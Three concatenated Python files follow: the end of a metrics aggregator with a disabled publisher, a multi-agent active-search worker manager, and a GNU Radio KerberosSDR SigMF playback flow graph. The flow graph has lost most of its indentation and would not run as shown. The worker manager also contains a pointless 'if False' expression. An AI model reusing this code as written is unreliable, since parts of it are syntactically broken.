            # Stopped: the recorded time; still running: elapsed so far.
            return str(self.time or cur_time - self.timestamp)
        else:
            return 'Not started'
class MetricsAggregator(object):
    """
    Aggregates counters, timers, levels and attributes for later flushing.

    MetricsAggregator is not threadsafe, and multiple clients writing the
    same metric "concurrently" may result in data loss.
    """
    def __init__(self):
        # clear() performs the full (re)initialisation, including the
        # version attribute — avoids duplicating the reset logic.
        self.clear()
    def increment(self, name, value=1):
        """Add `value` to counter `name`, creating it at 0 if absent."""
        cur = self._counters.get(name, 0)
        self._counters[name] = cur + value
    def timer(self, name, value):
        """Append a timing sample to the list for `name`."""
        # BUGFIX/cleanup: the original created two throwaway lists on the
        # first sample; setdefault does the same job in one step.
        self._timers.setdefault(name, []).append(value)
    def level(self, name, value):
        """Record the most recent level reading for `name`."""
        self._levels[name] = value
    def clear(self):
        """Reset all aggregated data (the version attribute is re-added)."""
        self._counters = {}
        self._timers = {}
        self._levels = {}
        self._attributes = {}
        self.attr("version", get_version())
    def attr(self, name, value):
        """Set a free-form attribute."""
        self._attributes[name] = value
    def flush(self):
        """Publish the current payload in a background thread, then reset."""
        publisher = MetricsPublisher()
        payload = {
            'counters': self._counters,
            'timers': self._timers,
            'levels': self._levels,
            'attributes': self._attributes
        }
        self.clear()
        count = (len(payload['counters']) + len(payload['timers']) +
                 len(payload['levels']))
        if count > 0:
            LOG.debug(json.dumps(payload))
            def publish():
                publisher.publish(payload)
            threading.Thread(target=publish).start()
class MetricsPublisher(object):
    """Stubbed metrics uploader: publishing is permanently disabled."""
    def __init__(self, url="nop", enabled=False):
        # Both arguments are accepted for API compatibility but ignored;
        # uploads are hard-disabled regardless of what the caller passes.
        self.enabled = False
    def publish(self, events):
        """No-op: the HTTP upload this once performed has been removed."""
        return
|
worker_manager.py | '''
Code for the work:
``Multi Agent Active Search using Realistic Depth-Aware Noise Model'', Ramina Ghods, William J Durkin and Jeff Schneider
(C) Ramina Ghods 2020 (rghods@cs.cmu.edu)
Please cite the following paper to use the code:
@article{ghods2020multi,
title={Multi-Agent Active Search using Realistic Depth-Aware Noise Model},
author={Ghods, Ramina and Durkin, William J and Schneider, Jeff},
journal={arXiv preprint arXiv:2011.04825},
year={2020}
}
***************************
Manager for multiple agents(workers).
(structure is referenced from parallel Thompson Sampling by:
``@inproceedings{kandasamy2018parallelised,
title={Parallelised bayesian optimisation via thompson sampling},
author={Kandasamy, Kirthevasan and Krishnamurthy, Akshay and Schneider, Jeff and P{\'o}czos, Barnab{\'a}s},
booktitle={International Conference on Artificial Intelligence and Statistics},
pages={133--142},
year={2018}
GitHub repository: {https://github.com/kirthevasank/gp-parallel-ts)}
}''
'''
import os
import shutil
import time
#from sets import Set
from multiprocessing import Process
import pickle as pkl
# Slack for receive-time comparisons; currently unused (the comparison that
# referenced it in fetch_latest_results is commented out).
TIME_TOL = 1e-5
class WorkerManager(object):
    """ Manages a pool of worker processes that evaluate points and hand
    results back through per-worker result files on disk. """

    def __init__(self, func_caller, worker_ids, poll_time, trialnum):
        """
        :param func_caller: object whose ActiveSearch method gets dispatched.
        :param worker_ids: iterable of worker ids, or an int worker count.
        :param poll_time: polling interval used by the optimiser.
        :param trialnum: experiment number, used to namespace log directories.
        """
        if hasattr(worker_ids, '__iter__'):
            self.worker_ids = worker_ids
        else:
            self.worker_ids = list(range(worker_ids))
        self.num_workers = len(self.worker_ids)
        self.poll_time = poll_time
        self.func_caller = func_caller
        # These will be set in reset
        self.optimiser = None
        self.latest_results = None
        # Reset
        self.reset(trialnum)

    def reset(self, trialnum):
        """ Resets everything. """
        self.optimiser = None
        self.latest_results = []  # A list of namespaces
        # Create the last receive times
        self.last_receive_times = {wid: 0.0 for wid in self.worker_ids}
        self.result_dir_names = {wid: './log/exp%d/result_%s' % (trialnum, str(wid))
                                 for wid in self.worker_ids}
        # Create the working directories
        self.working_dir_names = {wid: './log/exp%d/working_%s/tmp' % (trialnum, str(wid))
                                  for wid in self.worker_ids}
        self._result_file_name = 'result.pkl'
        self._num_file_read_attempts = 100
        self._file_read_poll_time = 0.5  # wait for 0.5 seconds
        self._child_reset()

    def _child_reset(self):
        """ Clears result dirs and marks every worker as free/idle. """
        self._delete_and_create_dirs(list(self.result_dir_names.values()))
        self._delete_dirs(list(self.working_dir_names.values()))
        self.free_workers = set(self.worker_ids)
        self.qinfos_in_progress = {wid: None for wid in self.worker_ids}
        self.worker_processes = {wid: None for wid in self.worker_ids}

    def set_optimiser(self, optimiser):
        """ Attaches the optimiser whose clock supplies receive times. """
        self.optimiser = optimiser

    def _delete_dirs(self, list_of_dir_names):
        """ Deletes a list of directories."""
        for dir_name in list_of_dir_names:
            if os.path.exists(dir_name):
                shutil.rmtree(dir_name)

    def _delete_and_create_dirs(self, list_of_dir_names):
        """ Deletes a list of directories and creates new ones. """
        for dir_name in list_of_dir_names:
            if os.path.exists(dir_name):
                shutil.rmtree(dir_name)
            os.makedirs(dir_name)

    def _get_result_file_name_for_worker(self, worker_id):
        """ Computes the result file name for the worker. """
        return os.path.join(self.result_dir_names[worker_id], self._result_file_name)

    def _read_result_from_file(self, result_file_name):
        """ Reads the pickled result, retrying while the worker may still be
        writing the file. Falls back to 0.5 if every attempt fails. """
        num_attempts = 0
        result = 0.5
        while num_attempts < self._num_file_read_attempts:
            try:
                with open(result_file_name, 'rb') as f:
                    result = pkl.load(f)
                break
            except Exception:
                # The file may be mid-write or not yet flushed: back off
                # and retry.  (Was a bare `except:`, which would also have
                # swallowed KeyboardInterrupt/SystemExit.)
                print('Encountered error %d times when reading %s. Trying again.'%(num_attempts,result_file_name))
                num_attempts += 1
                time.sleep(self._file_read_poll_time)
        return result

    def _read_result_from_worker_and_update(self, worker_id):
        """ Reads the result from the worker, records it in latest_results
        and returns the worker to the free pool. """
        result_file_name = self._get_result_file_name_for_worker(worker_id)
        val = self._read_result_from_file(result_file_name)
        # Now update the relevant qinfo and put it to latest_results
        qinfo = self.qinfos_in_progress[worker_id]
        qinfo.val = val  # dict of {x,y} from ThompsonActiveSearch
        qinfo.receive_time = self.optimiser.get_curr_spent_capital()
        qinfo.eval_time = qinfo.receive_time - qinfo.send_time
        self.latest_results.append(qinfo)
        # Update receive time
        self.last_receive_times[worker_id] = qinfo.receive_time
        # Delete the result file and the worker's scratch directory.
        os.remove(result_file_name)
        shutil.rmtree(self.working_dir_names[worker_id])
        # Reap the child process and mark the worker free again.
        self.worker_processes[worker_id].terminate()
        self.worker_processes[worker_id] = None
        self.qinfos_in_progress[worker_id] = None
        self.free_workers.add(worker_id)

    def fetch_latest_results(self):
        """ Returns results whose receive time has already passed according
        to the optimiser's spent capital; keeps the rest queued. """
        ret_idxs = []
        for i in range(len(self.latest_results)):
            if (self.latest_results[i].receive_time <=
                    self.optimiser.get_curr_spent_capital()):  # + TIME_TOL):
                ret_idxs.append(i)
        keep_idxs = [i for i in range(len(self.latest_results)) if i not in ret_idxs]
        # List of qinfo namespaces ({'x','y'} points from ThompsonActiveSearch).
        ret = [self.latest_results[i] for i in ret_idxs]
        self.latest_results = [self.latest_results[i] for i in keep_idxs]
        return ret

    def close_all_jobs(self):
        """ closes all jobs (TODO) """
        pass

    def _get_last_receive_time(self):
        """ Returns the last time we received a job. """
        return max(self.last_receive_times.values())

    def _worker_is_free(self, wid):
        """ Return True if worker wid is free. """
        if wid in self.free_workers:
            return True
        worker_result_file_name = self._get_result_file_name_for_wid_path(wid) if False else self._get_result_file_name_for_worker(wid)
        if os.path.exists(worker_result_file_name):
            self._read_result_from_worker_and_update(wid)
            # BUGFIX: the worker was just returned to the free pool, so
            # report it as free.  Previously this branch fell through and
            # returned None, making the caller treat the worker as busy for
            # one extra polling round.
            return True
        return False

    def a_worker_is_free(self):
        """ Return the last receive time if any worker is free, else None. """
        for wid in self.worker_ids:
            if self._worker_is_free(wid):
                return self._get_last_receive_time()
        return None

    def all_workers_are_free(self):
        """ Return the last receive time if all workers are free, else None. """
        all_free = True
        for wid in self.worker_ids:
            all_free = (all_free and self._worker_is_free(wid))
        if all_free:
            return self._get_last_receive_time()
        else:
            return None

    def _dispatch_evaluation(self, func_caller, point_dict, qinfo, worker_id, **kwargs):
        """ Dispatches an evaluation to worker_id in a fresh child process.

        :param point_dict: dict {'X': points searched so far, 'Y': observations}.
        :param func_caller: object providing ActiveSearch (ThompsonActiveSearch).
        :param qinfo: namespace carrying bookkeeping for this evaluation.
        :param worker_id: the agent that will perform this computation.
        """
        if self.qinfos_in_progress[worker_id] is not None:
            err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
                str(self.qinfos_in_progress), str(self.free_workers))
            # Include the state dump so the failure is diagnosable.
            raise ValueError('Check if worker is free before sending evaluation. ' + err_msg)
        # First add all the data to qinfo
        qinfo.worker_id = worker_id
        qinfo.working_dir = self.working_dir_names[worker_id]
        qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
        qinfo.point = point_dict
        # Create the working directory
        os.makedirs(qinfo.working_dir)
        # Dispatch the evaluation in a new process
        target_func = lambda: func_caller.ActiveSearch(point_dict, qinfo)
        self.worker_processes[worker_id] = Process(target=target_func)
        self.worker_processes[worker_id].start()
        # Mark the worker as busy.
        self.qinfos_in_progress[worker_id] = qinfo
        self.free_workers.discard(worker_id)

    def dispatch_single_evaluation(self, func_caller, point, qinfo, **kwargs):
        """ Dispatches a single evaluation to a free worker """
        wid = self.free_workers.pop()
        self._dispatch_evaluation(func_caller, point, qinfo, wid, **kwargs)

    def dispatch_batch_of_evaluations(self, func_caller, points, qinfos, **kwargs):
        """ Dispatches one evaluation per worker; the number of points must
        be a multiple of the number of workers. """
        assert (len(points['X']) % self.num_workers) == 0
        for wid in range(self.num_workers):
            self._dispatch_evaluation(func_caller, points, qinfos[wid],
                                      self.worker_ids[wid], **kwargs)
|
kerberos_sigmf_playback4.py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Kerberos Sigmf Playback4
# GNU Radio version: 3.7.13.4
##################################################
if __name__ == '__main__':
    import ctypes
    import sys
    if sys.platform.startswith('linux'):
        try:
            # Force X11 into thread-safe mode before Qt spins up GUI threads;
            # must happen before any other X11 call.
            x11 = ctypes.cdll.LoadLibrary('libX11.so')
            x11.XInitThreads()
        except:
            # Best-effort only; the GUI can still run, just less safely.
            # (Python 2 print statement — this file targets GNU Radio 3.7.)
            print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from PyQt4.QtCore import QObject, pyqtSlot
from gnuradio import analog
from gnuradio import blocks
from gnuradio import eng_notation
from gnuradio import fft
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio.eng_option import eng_option
from gnuradio.fft import window
from gnuradio.filter import firdes
from optparse import OptionParser
import adsb
import gr_sigmf
import math
import pyqt
import sip
import sys
import threading
import time
from gnuradio import qtgui
class kerberos_sigmf_playback4(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Kerberos Sigmf Playback4")
Qt.QWidget.__init__(self)
self.setWindowTitle("Kerberos Sigmf Playback4")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback4")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Variables
##################################################
self.function_probe_0_3 = function_probe_0_3 = 0
self.function_probe_0_2 = function_probe_0_2 = 0
self.function_probe_0_1 = function_probe_0_1 = 0
self.trig_delay = trig_delay = 0.001
self.trig_channel = trig_channel = 0
self.throttle = throttle = 10
self.thresh_phase = thresh_phase = 10
self.thresh_comp = thresh_comp = 10
self.thresh = thresh = 50
self.samp_rate = samp_rate = 2e6
self.samp_offset_0_3 = samp_offset_0_3 = function_probe_0_3
self.samp_offset_0_2 = samp_offset_0_2 = function_probe_0_2
self.samp_offset_0_1 = samp_offset_0_1 = function_probe_0_1
self.nfft = nfft = 8192
self.manual_fine_delay_3 = manual_fine_delay_3 = 0
self.manual_fine_delay_2 = manual_fine_delay_2 = 0
self.manual_fine_delay_1 = manual_fine_delay_1 = 0
self.manual_fine_delay_0 = manual_fine_delay_0 = 0
self.delay_3 = delay_3 = 1788
self.delay_2 = delay_2 = 5261
self.delay_1 = delay_1 = 734
self.delay_0 = delay_0 = 0
self.corr_alpha_0_3 = corr_alpha_0_3 = 0.01
self.corr_alpha_0_2 = corr_alpha_0_2 = 0.01
self.corr_alpha_0_1 = corr_alpha_0_1 = 0.01
##################################################
# Blocks
##################################################
self.probe_offset_0_3 = blocks.probe_signal_f()
self.probe_offset_0_2 = blocks.probe_signal_f()
self.probe_offset_0_1 = blocks.probe_signal_f()
self.main_tab = Qt.QTabWidget()
self.main_tab_widget_0 = Qt.QWidget()
self.main_tab_layout_0 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_0)
self.main_tab_grid_layout_0 = Qt.QGridLayout()
self.main_tab_layout_0.addLayout(self.main_tab_grid_layout_0)
self.main_tab.addTab(self.main_tab_widget_0, 'Channel')
self.main_tab_widget_1 = Qt.QWidget()
self.main_tab_layout_1 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_1)
self.main_tab_grid_layout_1 = Qt.QGridLayout()
self.main_tab_layout_1.addLayout(self.main_tab_grid_layout_1)
self.main_tab.addTab(self.main_tab_widget_1, 'Coarse Adjust')
self.main_tab_widget_2 = Qt.QWidget()
self.main_tab_layout_2 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_2)
self.main_tab_grid_layout_2 = Qt.QGridLayout()
self.main_tab_layout_2.addLayout(self.main_tab_grid_layout_2)
self.main_tab.addTab(self.main_tab_widget_2, 'Correlate')
self.main_tab_widget_3 = Qt.QWidget()
self.main_tab_layout_3 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_3)
self.main_tab_grid_layout_3 = Qt.QGridLayout()
self.main_tab_layout_3.addLayout(self.main_tab_grid_layout_3)
self.main_tab.addTab(self.main_tab_widget_3, 'Single Decode')
self.main_tab_widget_4 = Qt.QWidget()
self.main_tab_layout_4 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_4)
self.main_tab_grid_layout_4 = Qt.QGridLayout()
self.main_tab_layout_4.addLayout(self.main_tab_grid_layout_4)
self.main_tab.addTab(self.main_tab_widget_4, 'Sum and Decode')
self.main_tab_widget_5 = Qt.QWidget()
self.main_tab_layout_5 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_5)
self.main_tab_grid_layout_5 = Qt.QGridLayout()
self.main_tab_layout_5.addLayout(self.main_tab_grid_layout_5)
self.main_tab.addTab(self.main_tab_widget_5, 'Phase Analysis')
self.top_grid_layout.addWidget(self.main_tab, 0, 0, 1, 2)
for r in range(0, 1):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._trig_delay_tool_bar = Qt.QToolBar(self)
self._trig_delay_tool_bar.addWidget(Qt.QLabel("trig_delay"+": "))
self._trig_delay_line_edit = Qt.QLineEdit(str(self.trig_delay))
self._trig_delay_tool_bar.addWidget(self._trig_delay_line_edit)
self._trig_delay_line_edit.returnPressed.connect(
lambda: self.set_trig_delay(eng_notation.str_to_num(str(self._trig_delay_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._trig_delay_tool_bar, 2, 1, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._trig_channel_options = (0, 1, 2, 3, )
self._trig_channel_labels = ('chan0', 'chan1', 'chan2', 'chan3', )
self._trig_channel_tool_bar = Qt.QToolBar(self)
self._trig_channel_tool_bar.addWidget(Qt.QLabel("trig_channel"+": "))
self._trig_channel_combo_box = Qt.QComboBox()
self._trig_channel_tool_bar.addWidget(self._trig_channel_combo_box)
for label in self._trig_channel_labels: self._trig_channel_combo_box.addItem(label)
self._trig_channel_callback = lambda i: Qt.QMetaObject.invokeMethod(self._trig_channel_combo_box, "setCurrentIndex", Qt.Q_ARG("int", self._trig_channel_options.index(i)))
self._trig_channel_callback(self.trig_channel)
self._trig_channel_combo_box.currentIndexChanged.connect(
lambda i: self.set_trig_channel(self._trig_channel_options[i]))
self.main_tab_grid_layout_1.addWidget(self._trig_channel_tool_bar, 2, 0, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._throttle_tool_bar = Qt.QToolBar(self)
self._throttle_tool_bar.addWidget(Qt.QLabel('Throttle'+": "))
self._throttle_line_edit = Qt.QLineEdit(str(self.throttle))
self._throttle_tool_bar.addWidget(self._throttle_line_edit)
self._throttle_line_edit.returnPressed.connect(
lambda: self.set_throttle(eng_notation.str_to_num(str(self._throttle_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._throttle_tool_bar, 9, 1, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(1, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._thresh_phase_tool_bar = Qt.QToolBar(self)
self._thresh_phase_tool_bar.addWidget(Qt.QLabel('Complex Threshold'+": "))
self._thresh_phase_line_edit = Qt.QLineEdit(str(self.thresh_phase))
self._thresh_phase_tool_bar.addWidget(self._thresh_phase_line_edit)
self._thresh_phase_line_edit.returnPressed.connect(
lambda: self.set_thresh_phase(eng_notation.str_to_num(str(self._thresh_phase_line_edit.text().toAscii()))))
self.main_tab_grid_layout_5.addWidget(self._thresh_phase_tool_bar, 5, 0, 1, 1)
for r in range(5, 6):
self.main_tab_grid_layout_5.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_5.setColumnStretch(c, 1)
self._thresh_comp_tool_bar = Qt.QToolBar(self)
self._thresh_comp_tool_bar.addWidget(Qt.QLabel('Complex Threshold'+": "))
self._thresh_comp_line_edit = Qt.QLineEdit(str(self.thresh_comp))
self._thresh_comp_tool_bar.addWidget(self._thresh_comp_line_edit)
self._thresh_comp_line_edit.returnPressed.connect(
lambda: self.set_thresh_comp(eng_notation.str_to_num(str(self._thresh_comp_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._thresh_comp_tool_bar, 8, 0, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._thresh_tool_bar = Qt.QToolBar(self)
self._thresh_tool_bar.addWidget(Qt.QLabel('GUI Threshold'+": "))
self._thresh_line_edit = Qt.QLineEdit(str(self.thresh))
self._thresh_tool_bar.addWidget(self._thresh_line_edit)
self._thresh_line_edit.returnPressed.connect(
lambda: self.set_thresh(eng_notation.str_to_num(str(self._thresh_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._thresh_tool_bar, 9, 0, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 1):
self.top_grid_layout.setColumnStretch(c, 1)
self._manual_fine_delay_3_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_3_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_3"+": "))
self._manual_fine_delay_3_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_3))
self._manual_fine_delay_3_tool_bar.addWidget(self._manual_fine_delay_3_line_edit)
self._manual_fine_delay_3_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_3(int(str(self._manual_fine_delay_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_3_tool_bar, 8, 1, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._manual_fine_delay_2_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_2_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_2"+": "))
self._manual_fine_delay_2_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_2))
self._manual_fine_delay_2_tool_bar.addWidget(self._manual_fine_delay_2_line_edit)
self._manual_fine_delay_2_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_2(int(str(self._manual_fine_delay_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_2_tool_bar, 7, 1, 1, 1)
for r in range(7, 8):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._manual_fine_delay_1_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_1_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_1"+": "))
self._manual_fine_delay_1_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_1))
self._manual_fine_delay_1_tool_bar.addWidget(self._manual_fine_delay_1_line_edit)
self._manual_fine_delay_1_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_1(int(str(self._manual_fine_delay_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_1_tool_bar, 6, 1, 1, 1)
for r in range(6, 7):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._manual_fine_delay_0_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_0_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_0"+": "))
self._manual_fine_delay_0_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_0))
self._manual_fine_delay_0_tool_bar.addWidget(self._manual_fine_delay_0_line_edit)
self._manual_fine_delay_0_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_0(int(str(self._manual_fine_delay_0_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_0_tool_bar, 5, 1, 1, 1)
for r in range(5, 6):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
        # Poll the probe_offset_0_3 signal probe at ~100 Hz and push each
        # sampled level into the function_probe_0_3 variable. Runs forever on
        # a daemon thread (started just below by GRC-generated code).
        def _function_probe_0_3_probe():
            while True:
                val = self.probe_offset_0_3.level()
                try:
                    self.set_function_probe_0_3(val)
                except AttributeError:
                    # Setter may not be bound yet while the flow graph is
                    # still constructing; drop this sample and retry.
                    pass
                time.sleep(1.0 / (100))
_function_probe_0_3_thread = threading.Thread(target=_function_probe_0_3_probe)
_function_probe_0_3_thread.daemon = True
_function_probe_0_3_thread.start()
        # Poll the probe_offset_0_2 signal probe at ~100 Hz and push each
        # sampled level into the function_probe_0_2 variable. Runs forever on
        # a daemon thread (started just below by GRC-generated code).
        def _function_probe_0_2_probe():
            while True:
                val = self.probe_offset_0_2.level()
                try:
                    self.set_function_probe_0_2(val)
                except AttributeError:
                    # Setter may not be bound yet while the flow graph is
                    # still constructing; drop this sample and retry.
                    pass
                time.sleep(1.0 / (100))
_function_probe_0_2_thread = threading.Thread(target=_function_probe_0_2_probe)
_function_probe_0_2_thread.daemon = True
_function_probe_0_2_thread.start()
        # Poll the probe_offset_0_1 signal probe at ~100 Hz and push each
        # sampled level into the function_probe_0_1 variable. Runs forever on
        # a daemon thread (started just below by GRC-generated code).
        def _function_probe_0_1_probe():
            while True:
                val = self.probe_offset_0_1.level()
                try:
                    self.set_function_probe_0_1(val)
                except AttributeError:
                    # Setter may not be bound yet while the flow graph is
                    # still constructing; drop this sample and retry.
                    pass
                time.sleep(1.0 / (100))
_function_probe_0_1_thread = threading.Thread(target=_function_probe_0_1_probe)
_function_probe_0_1_thread.daemon = True
_function_probe_0_1_thread.start()
self._delay_3_tool_bar = Qt.QToolBar(self)
self._delay_3_tool_bar.addWidget(Qt.QLabel("delay_3"+": "))
self._delay_3_line_edit = Qt.QLineEdit(str(self.delay_3))
self._delay_3_tool_bar.addWidget(self._delay_3_line_edit)
self._delay_3_line_edit.returnPressed.connect(
lambda: self.set_delay_3(int(str(self._delay_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_3_tool_bar, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_2_tool_bar = Qt.QToolBar(self)
self._delay_2_tool_bar.addWidget(Qt.QLabel("delay_2"+": "))
self._delay_2_line_edit = Qt.QLineEdit(str(self.delay_2))
self._delay_2_tool_bar.addWidget(self._delay_2_line_edit)
self._delay_2_line_edit.returnPressed.connect(
lambda: self.set_delay_2(int(str(self._delay_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_2_tool_bar, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_1_tool_bar = Qt.QToolBar(self)
self._delay_1_tool_bar.addWidget(Qt.QLabel("delay_1"+": "))
self._delay_1_line_edit = Qt.QLineEdit(str(self.delay_1))
self._delay_1_tool_bar.addWidget(self._delay_1_line_edit)
self._delay_1_line_edit.returnPressed.connect(
lambda: self.set_delay_1(int(str(self._delay_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_1_tool_bar, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_0_tool_bar = Qt.QToolBar(self)
self._delay_0_tool_bar.addWidget(Qt.QLabel("delay_0"+": "))
self._delay_0_line_edit = Qt.QLineEdit(str(self.delay_0))
self._delay_0_tool_bar.addWidget(self._delay_0_line_edit)
self._delay_0_line_edit.returnPressed.connect(
lambda: self.set_delay_0(int(str(self._delay_0_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_0_tool_bar, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._corr_alpha_0_3_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_3_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_3"+": "))
self._corr_alpha_0_3_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_3))
self._corr_alpha_0_3_tool_bar.addWidget(self._corr_alpha_0_3_line_edit)
self._corr_alpha_0_3_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_3(eng_notation.str_to_num(str(self._corr_alpha_0_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_3_tool_bar, 8, 2, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_2_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_2_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_2"+": "))
self._corr_alpha_0_2_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_2))
self._corr_alpha_0_2_tool_bar.addWidget(self._corr_alpha_0_2_line_edit)
self._corr_alpha_0_2_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_2(eng_notation.str_to_num(str(self._corr_alpha_0_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_2_tool_bar, 8, 1, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_1_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_1_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_1"+": "))
self._corr_alpha_0_1_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_1))
self._corr_alpha_0_1_tool_bar.addWidget(self._corr_alpha_0_1_line_edit)
self._corr_alpha_0_1_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_1(eng_notation.str_to_num(str(self._corr_alpha_0_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_1_tool_bar, 8, 0, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.single_pole_iir_filter_xx_0_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_3, nfft)
self.single_pole_iir_filter_xx_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_2, nfft)
self.single_pole_iir_filter_xx_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_1, nfft)
self.sigmf_source_3 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN3_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
